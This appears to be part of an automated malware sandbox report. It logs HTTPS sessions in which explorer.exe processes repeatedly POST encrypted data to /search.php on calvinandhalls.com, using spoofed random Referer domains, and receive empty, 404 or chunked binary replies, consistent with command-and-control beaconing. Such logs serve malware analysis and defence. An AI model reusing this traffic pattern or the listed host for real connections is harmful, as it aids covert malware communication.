                                                                                                                                                              2024-09-30 13:38:52 UTC230OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 4a ae 02 ff 81 b2 16 49 d1 2b 7c e9 42 92 c9 63 22 ab 73 0d 2d 9a a7 83 65 ac ec 08 0d 91 99 4a ea 71 63 b2 8b 78 68 5d 0b 41 27 ff 0f d7 8c 8b 1d 98 a6 73 07 59 93 41 14 f4 48 7b de fd 97 8f 2c 1a a8 0e f9 48 b7 6e 4d a9 2c a7 4e 6f 36 38 0a c2 f2 41 a5 ba 60 dd 38 10 f8 b2 bb 0a a3 8f 69 87 95 b3 95 43 59 df d2 a0 08 33 b9 16 55 9e 18 71 49 e9 3a 11 7b de 5a 6d 59 f6 bf 9a 2e 3c d3 c8 04 f7 29 cf dd e2 04 65 6a 3c f3 19 7d 68 0f 1c f1 5d 88 b3 76 64
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Ll4%<JI+|Bc"s-eJqcxh]A'sYAH{,HnM,No68A`8iCY3UqI:{ZmY.<)ej<}h]vd
                                                                                                                                                              2024-09-30 13:38:53 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:53 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.84974623.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:53 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://ffcibdqlkyf.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 192
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:53 UTC192OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 3f ce 7f 93 cc b1 33 20 df 11 0d 87 5c e4 98 01 77 b1 7c 54 75 dc ff 8d 31 d3 af 12 17 d9 eb 59 b3 32 5a 9c f3 73 09 21 12 5b 3e 8d 31 d3 e5 8b 0a f4 97 6f 1f 34 82 1f 36 b4 6f 51 d6 c0 9b 99 3e 60 bc 0c eb 27 99 7a 2e d7 07 d5 6a 4b 2d 0c 7d d1 e6 7d fa a2 0d dc 51 7e f2 e8 9c 45 eb b1 0a e7 a9 e9 a1 09 30 a1 cc 9f 65 5f b5 78 10 9f 6f 22
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lm4%<?3 \w|Tu1Y2Zs![>1o46oQ>`'z.jK-}}Q~E0e_xo"
                                                                                                                                                              2024-09-30 13:38:54 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:54 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.2.84974723.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:54 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://ywfvqxxvpvjvadf.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 139
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:54 UTC139OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 30 a6 0a e6 96 ad 27 20 cf 2f 2d a6 25 d1 d0 63 7d e4 05 08 6d ae ce e9 41 ff b4 53 1b fc a4 21 89 79 6d 9e dc 16 73 56 1e 55 19 f9 05 89 9c ae 0e dc f1 42 66 55 92 09 04 e5 7b 13 ae
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lb4%<0' /-%c}mAS!ymsVUBfU{
                                                                                                                                                              2024-09-30 13:38:55 UTC294INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:55 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2024-09-30 13:38:55 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 a4 f3 ac ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                                                                              Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
                                                                                                                                                              2024-09-30 13:38:55 UTC19INData Raw: 1a 58 b1 16 d2 fd ef 1b ab d7 46 98 af 19 24 1b 3c de a6
                                                                                                                                                              Data Ascii: XF$<
                                                                                                                                                              2024-09-30 13:38:55 UTC2INData Raw: 0d 0a
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2024-09-30 13:38:55 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                                                                                              Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                                                                                              2024-09-30 13:38:55 UTC6INData Raw: 4e 13 8c ae b0 c5
                                                                                                                                                              Data Ascii: N
                                                                                                                                                              2024-09-30 13:38:55 UTC2INData Raw: 0d 0a
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2024-09-30 13:38:55 UTC8192INData Raw: 32 30 30 30 0d 0a 35 b2 82 d9 81 f6 49 55 1c 8d 04 5f c4 c2 8a 45 ec 18 f5 d8 fd a3 a0 c4 ae 36 1a 9f e2 f9 78 50 95 22 b7 53 4f 27 b1 f4 18 0e 17 d3 04 0a 15 7b 21 da bb 61 41 09 53 89 63 26 06 92 dd b9 cb 36 d9 2b b1 d3 b5 7f 99 b4 fd 21 7f 68 a1 a3 9a c8 f2 df ce 50 b9 f6 65 4b 05 db dd 03 f4 43 65 c4 8c 61 3e 97 ba 4a 79 8f 0c fe ee 9a 91 1c 6c 77 25 cd 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 65 b4 ed 87 11 52 c9 bd 4c b2 d4 66 9f da 30 3f 8d 93 5a f7 d7 f1 5d 31 3d a5 2c 47 87 4b 21 aa 61 84 35 f5 f7 9a 70 4c 4f fb 1e f9 e1 fe d1 ec c9 ff 05 71 1e 89 dd 8a 35
                                                                                                                                                              Data Ascii: 20005IU_E6xP"SO'{!aASc&6+!hPeKCea>Jylw%DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"veRLf0?Z]1=,GK!a5pLOq5
                                                                                                                                                              2024-09-30 13:38:55 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                                                                                              Data Ascii: G-Q
                                                                                                                                                              2024-09-30 13:38:55 UTC2INData Raw: 0d 0a
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              11192.168.2.84974823.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:56 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://dbbwmiqkkpy.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 316
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:56 UTC316OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 62 34 01 83 b6 25 93 3c 47 bf 17 b9 8e aa 09 56 a2 1c 1b 85 38 f3 c4 30 6d cb 0d 16 2b aa b9 92 23 d9 d6 08 77 80 88 4a b9 25 2d a8 d6 5a 14 42 69 09 1a c2 2a 80 cf d7 05 cf 91 63 0e 02 eb 67 48 f6 4e 1d c3 9d ea c0 54 75 81 56 e4 76 b6 6f 5f 9e 59 a7 31 4c 43 67 63 c7 f3 5a 91 89 16 99 4b 1a 91 be dd 19 b3 87 71 96 df eb d2 15 60 88 82 b4 04 15 de 70 5d 9f 04 07 19 fb 59 7c 36 fa 02 03 0f ee 8d 8e 23 59 80 ed 00 8a 7f ce bb a0 70 34 0d 43 cd 1b 03 08 4e 10 c3 16 be 84 7f 48 28 49 54 83 8b 7f 65 27 37 8f 9a e0 48 85 c4 1e d2 27 a5 93 b4 81 5f c3 4e
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[ALb4%<GV80m+#wJ%-ZBi*cgHNTuVvo_Y1LCgcZKq`p]Y|6#Yp4CNH(ITe'7H'_N
                                                                                                                                                              2024-09-30 13:38:56 UTC287INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:56 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 409
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-09-30 13:38:56 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              12192.168.2.84974923.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:57 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://gklmvitduapshup.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 367
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:57 UTC367OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 33 f3 16 9e d7 ec 1f 04 db 74 60 b5 3b d4 8c 7f 18 e0 74 27 74 be c4 d1 76 b6 e7 0d 11 f3 8d 5f 84 5e 38 90 d9 14 34 61 02 21 3f fc 0e d6 98 82 0a c0 89 30 06 5d b0 4d 20 bb 30 41 9b d8 b3 a8 5b 33 96 10 a1 58 8e 27 52 df 46 d8 4f 36 34 35 00 bd b7 5f f3 96 1c e1 5f 28 91 e4 84 44 a7 9b 17 9f c0 f9 83 1f 29 95 a5 dc 71 35 c3 0e 3c f6 64 70 39 fd 2f 17 38 a6 3f 78 5b 9d 8d 91 05 4c 99 d0 1d 88 66 9f f2 da 78 7b 02 29 c1 4a 14 0d 48 67 d2 09 b8 d1 7c 1d 1a 27 42 9f b1 66 42 34 24 a8 fd ed 39 86 de 3e fd 63 d3 fd f6 c7 79 de 73
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lc4%<3t`;t'tv_^84a!?0]M 0A[3X'RFO645__(D)q5<dp9/8?x[Lfx{)JHg|'BfB4$9>cys
                                                                                                                                                              2024-09-30 13:38:57 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:57 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              13192.168.2.84975023.145.40.1624431012C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:39:03 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://calvinandhalls.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 501
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:39:03 UTC501OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad 86 1e d8 39 7b ec e1 b1 3a c4 82 74 bf a9 ae b0 3c 40 b1 a9 83 68 08 b6 4f 33 ef 1c 56 37 92 4c 30 54 db 10 16 27 d8 9a c1 22 28 9e f1 4d c6 4d f9 a5 fd 3d 62 78 55 c1 69 0d 6d 2e 12 ea 19 9d a6 13 37 17 43 39 f8 98 43 6d 54 28 ab ee 99 39 f9 c9 6b f8 45 8a 9d d5 a4 7a b5 55
                                                                                                                                                              Data Ascii: ryid8a(f|5r2nluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu|9{:t<@hO3V7L0T'"(MM=bxUim.7C9CmT(9kEzU
                                                                                                                                                              2024-09-30 13:39:03 UTC287INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:39:03 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 409
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-09-30 13:39:03 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              14192.168.2.84975723.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:40:17 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://jefnxxqxuxib.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:40:17 UTC109OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                                              2024-09-30 13:40:17 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:40:17 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 7
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-09-30 13:40:17 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              15192.168.2.84975923.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:40:37 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://npjscmvmupb.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:40:37 UTC109OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                                              2024-09-30 13:40:37 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:40:37 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 7
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-09-30 13:40:37 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              16192.168.2.84976123.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:40:59 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://ipmfrunnoji.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:40:59 UTC109OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                                                              2024-09-30 13:40:59 UTC285INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:40:59 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 7
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-09-30 13:40:59 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              17192.168.2.84976323.145.40.1624434084C:\Windows\explorer.exe
